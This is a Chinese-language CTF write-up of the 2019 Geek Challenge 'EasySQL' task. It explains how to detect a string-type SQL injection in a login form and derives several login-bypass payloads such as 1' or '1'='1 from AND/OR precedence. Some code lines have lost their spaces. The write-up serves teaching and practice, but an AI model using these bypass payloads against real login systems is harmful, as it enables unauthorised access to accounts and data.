【极客大挑战 2019】EasySQL

[极客大挑战 2019] EasySQL

判断是数字还是字符型注入

正常查询的回显

输入字符型判断一下，发现报错了，看报错显示 ‘1’‘’,输入的是1’，这里查询语句中应该是存在一个单引号的，所以这里报错了，多了一个单引号，说明这里存在字符型的注入，先用万能钥匙测测

使用万能钥匙一测，第一次 正常回显错误，然后又用字符型的测了一下，发现这里的报错中带有 一部分的查询语句

# 万能公式1and1=11' and '1'='11or1=11' or '1'='1

为什么用 1’ and ‘1’='1不行呢？

测试的时候输入了 1’ and ‘1’=1这个有问题的payload，看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询，and 的两边同时为TRUE 结果才能为 TRUE，所以输入的payload一定要符合这个条件就可以登录成功了。

# payloadSELECT*FROMtablesWHERE username='1'or'1'='1'and password='1'or'1'='1'# 优先级排序：and 优先级高于 or，所以要计算 and 然后再计算 or
username='1'--->false'1'='1'---> true
passwrod='1'--->false'1'='1'--->truefalseor(trueandfalse)ortruefalseorfalseortruefalseortrue#得出结果：true

照这种方法就可以推算出不同的解法

# payload1# 用户名：1' and '1'='1# 密码：1' or '1'='1# payload2# 用户名：1' and '1'='2# 密码：1' or '1'='1# 本质上都是利用 and 和 or 的优先级进行判断，只要返回 TRUE 就没问题